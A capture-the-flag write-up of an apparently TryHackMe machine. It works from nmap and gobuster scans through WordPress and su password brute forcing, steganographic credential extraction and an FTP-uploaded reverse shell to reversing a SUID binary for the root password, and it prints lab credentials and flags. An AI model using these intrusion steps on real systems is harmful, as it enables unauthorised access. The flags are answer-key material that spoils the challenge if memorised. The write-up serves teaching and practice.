Port scanning

sudo nmap --min-rate 10000 -p- 10.10.35.124         
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 11:18 CST
Nmap scan report for 10.10.35.124
Host is up (0.22s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
sudo nmap -sT -sV -sC -O -p21,80 10.10.35.124          
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 11:20 CST
Nmap scan report for 10.10.35.124
Host is up (0.21s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.6
|_http-title: Hello World – Just another WordPress site
|_http-server-header: Apache/2.4.29 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Unix
sudo nmap --script=vuln -p21,80 10.10.35.124                                                  
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 11:20 CST
Nmap scan report for 10.10.35.124
Host is up (0.22s latency).

PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.35.124
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.35.124:80/
| Form id:
|_ Form action: http://adana.thm/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: hakanbey01
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| http-enum:
| /wp-login.php: Possible admin folder
| /phpmyadmin/: phpMyAdmin
| /readme.html: Wordpress version: 2
| /: WordPress version: 5.6
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
|_ /readme.html: Interesting, a readme.

Two ports.

Web

Add adana.thm to the hosts file.

gobuster dir -u http://10.10.35.124/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x rar,zip,sql,txt,jsp,php,html,bak

Found a hidden directory: /announcements

Inside are an image and a wordlist.

Checked the image with exiftool, strings and binwalk; no steganography found.

Since we now have a wordlist, and the scan above gave us the username hakanbey01, let's try brute-forcing the password:

wpscan --url http://adana.thm/wp-login.php -U hakanbey01 -P wordlist.txt

But the brute force finds nothing? Maybe this is a red herring. Looking at the room's tags, one of them is stego, image steganography??? Perhaps the image we found is useful after all.

stegseek austrailian-bulldog-ant.jpg wordlist.txt

This yields a base64 string:

RlRQLUxPR0lOClVTRVI6IGhha2FuZnRwClBBU1M6IDEyM2FkYW5hY3JhY2s=

FTP-LOGIN
USER: hakanftp
PASS: 123adanacrack

Log in to FTP.

Getshell

We land in a directory that matches the web root, so let's upload a reverse shell over FTP. But after uploading, requesting it returns "file not found"?? Maybe a WAF or something similar is blocking it.

Some information found in wp-config.php:

define( 'DB_NAME', 'phpmyadmin1' );

/** MySQL database username */
define( 'DB_USER', 'phpmyadmin' );

/** MySQL database password */
define( 'DB_PASSWORD', '12345' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

Log in to phpMyAdmin.

The user's hash is in the wp_users table:

$P$BQML2QxAFBH4hb.qqKTpDnta6Q6Wl2/

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

But it doesn't crack. Hmm.

I started wondering why the uploaded reverse shell returned 404 even though it was clearly there in the FTP directory. Let's try fuzzing subdomains:

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.adana.thm" -u http://adana.thm/ -fs 10846

While fuzzing, I noticed it was odd that there are two phpmyadmin databases, and that their wp_options differ. A subdomain, subdomain.adana.thm, turns up; it must be another virtual host, so add it to hosts. Visiting it reveals two nearly identical sites.

Request the previously uploaded reverse shell; it also needs chmod 777 reverseshell.php to make it executable.

Request it and get a shell.

Two users found: hakanbey and hakanftp.

The web flag is in /var/www/html:

THM{343a7e2064a1d992c01ee201c346edff}

Lateral movement

We can switch to the hakanftp user, but that doesn't help much.

I looked up sucrack, which the room mentions; it's a tool for brute-forcing user passwords through su.

After downloading it, pack it up:

tar -czvf sucrack.tar.gz ./sucrack 

Over FTP, upload sucrack and the earlier wordlist, then build and run it on the target:

put sucrack.tar.gz
put wordlist.txt
chmod 777 sucrack.tar.gz
chmod 777 wordlist.txt
mv /var/www/subdomain/sucrack.tar.gz /tmp
mv /var/www/subdomain/wordlist.txt /tmp
tar xfz sucrack.tar.gz 
cd sucrack
./configure
make
cd src
./sucrack -u hakanbey -w 100 /tmp/wordlist.txt

But it doesn't crack. According to the walkthrough, the wordlist needs some changes:

awk '{print "123adana" $0}' wordlist.txt > new-wordlist.txt

This prepends "123adana" to every entry in the wordlist.

./sucrack -u hakanbey -w 100 /tmp/new-wordlist.txt

Password obtained: 123adanasubaru

su hakanbey

user.txt

THM{8ba9d7715fe726332b7fc9bd00e67127}

Privilege escalation

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

A suspicious /usr/bin/binary turns up.

It asks us to enter something; let's throw it into IDA and reverse it.

v26 = __readfsqword(0x28u);
*dest = 'raw';
v9 = '\0';
*src = 'enoz';
v11 = '\0';
*v12 = 'ni';
v13 = '\0';
*v14 = 'ada';
v15 = '\0';
*v16 = 'an';
v17 = '\0';
strcat(dest, src);
strcat(dest, v12);
strcat(dest, v14);
strcat(dest, v16);
printf("I think you should enter the correct string here ==>");
__isoc99_scanf("%s", s1);
if ( !strcmp(s1, dest) )
{
stream = fopen("/root/hint.txt", "r");
__isoc99_fscanf(stream, "%s", s);
printf("Hint! : %s", s);
fgets(s, 255, stream);
puts(s);
v6 = fopen("/root/root.jpg", "rb");
if ( !v6 )
{
puts("Unable to open source!");
exit(1);
}
v7 = fopen("/home/hakanbey/root.jpg", "wb");
puts("Copy /root/root.jpg ==> /home/hakanbey/root.jpg");

Roughly, we need to enter a string equal to dest, and dest is assembled from the constants above. Note that this Linux box is little-endian, so each multi-character constant has to be read backwards to get the real order.

So dest is warzoneinadana.
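To make the little-endian reading mechanical rather than eyeballed, here is an added Python example (not from the original writeup) that takes the multi-character constants exactly as IDA printed them and reproduces what the 4-byte stores leave in memory. It assumes gcc's big-endian packing of multi-character constants ('raw' becomes 0x00726177) and an x86-64 little-endian store; the constant list is copied from the decompiled snippet above.

```python
import struct

# Multi-character constants as IDA printed them in the decompiled /usr/bin/binary,
# in the order the code strcat()s them onto dest.
IDA_CONSTANTS = ["raw", "enoz", "ni", "ada", "an"]


def multichar_to_int(s: str) -> int:
    """Value of a C multi-character constant the way gcc computes it:
    characters packed big-endian, so 'raw' -> 0x00726177."""
    value = 0
    for ch in s:
        value = (value << 8) | ord(ch)
    return value


def store_little_endian(value: int) -> bytes:
    """The 4 bytes that a store like `*dest = 'raw'` leaves in memory
    on a little-endian (x86-64) machine."""
    return struct.pack("<I", value)


def fragment_from_constant(s: str) -> str:
    """Read the stored bytes back as a C string (stop at the first NUL)."""
    raw = store_little_endian(multichar_to_int(s))
    return raw.split(b"\0", 1)[0].decode("ascii")


def reconstruct_dest(constants=IDA_CONSTANTS) -> str:
    """Concatenate the fragments in the same order as the strcat() calls."""
    return "".join(fragment_from_constant(c) for c in constants)


if __name__ == "__main__":
    for c in IDA_CONSTANTS:
        v = multichar_to_int(c)
        mem = store_little_endian(v).hex()
        print(f"'{c}' -> 0x{v:08x} -> memory {mem} -> {fragment_from_constant(c)!r}")
    print("dest =", reconstruct_dest())
```

The per-constant trace makes the point of the paragraph visible: the decompiler shows the immediate value, but the program compares against the bytes in memory, which on this architecture are the characters in reverse.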

Run binary and enter warzoneinadana: a jpg appears in the home directory, and it prints a hint: Hexeditor 00000020 ==> ????

Transfer it to Kali with nc.

xxd root.jpg

Take the bytes on the 00000020 line:

fee99d3d79185ffc826ddf1c69acc275

In CyberChef: From Hex, then To Base85.

This gives the root password: Go0odJo0BbBro0o
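The CyberChef recipe can be reproduced offline. The following is an added Python example, not part of the original writeup: it decodes the hex from the 00000020 line quoted above and Base85-encodes the 16 resulting bytes with the standard ASCII85 alphabet, which I assume is what CyberChef's To Base85 uses by default. The encoded text comes out as root: followed by the password, which is why the credential above is the 15 characters after the colon rather than all 20 output characters.

```python
import base64

# The 16 bytes from the xxd line at offset 0x00000020 of root.jpg, as quoted above.
XXD_LINE_0x20 = "fee99d3d79185ffc826ddf1c69acc275"


def base85_from_hex(hex_str: str) -> str:
    """Replicates CyberChef 'From Hex' -> 'To Base85' (standard ASCII85 alphabet,
    no <~ ~> framing): 4 input bytes become 5 printable characters."""
    raw = bytes.fromhex(hex_str)
    return base64.a85encode(raw).decode("ascii")


def extract_password(hex_str: str) -> str:
    """The encoded text is a 'label:secret' pair; return only the secret part."""
    text = base85_from_hex(hex_str)
    label, sep, secret = text.partition(":")
    if not sep:
        raise ValueError(f"no label:secret separator in {text!r}")
    return secret


if __name__ == "__main__":
    print("ascii85 :", base85_from_hex(XXD_LINE_0x20))
    print("password:", extract_password(XXD_LINE_0x20))
```

Note the direction: the hint points at raw bytes that were *produced* by Base85-decoding the text, so recovering the text means encoding, not decoding, which is also why 16 bytes give exactly 20 characters with no padding.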

root.txt

THM{c5a9d3e4147a13cbd1ca24b014466a6c}

Ramblings

Hard-rated box, solid performance as usual! That's another machine in a row with virtual hosts, so I need to pay more attention to domain names from now on. This box really has a lot of rabbit holes, and falling into any one of them means a long time of suffering (sad). There's reverse engineering, image steganography, and handling the raw bytes of an image: very CTF. Still a lot of fun.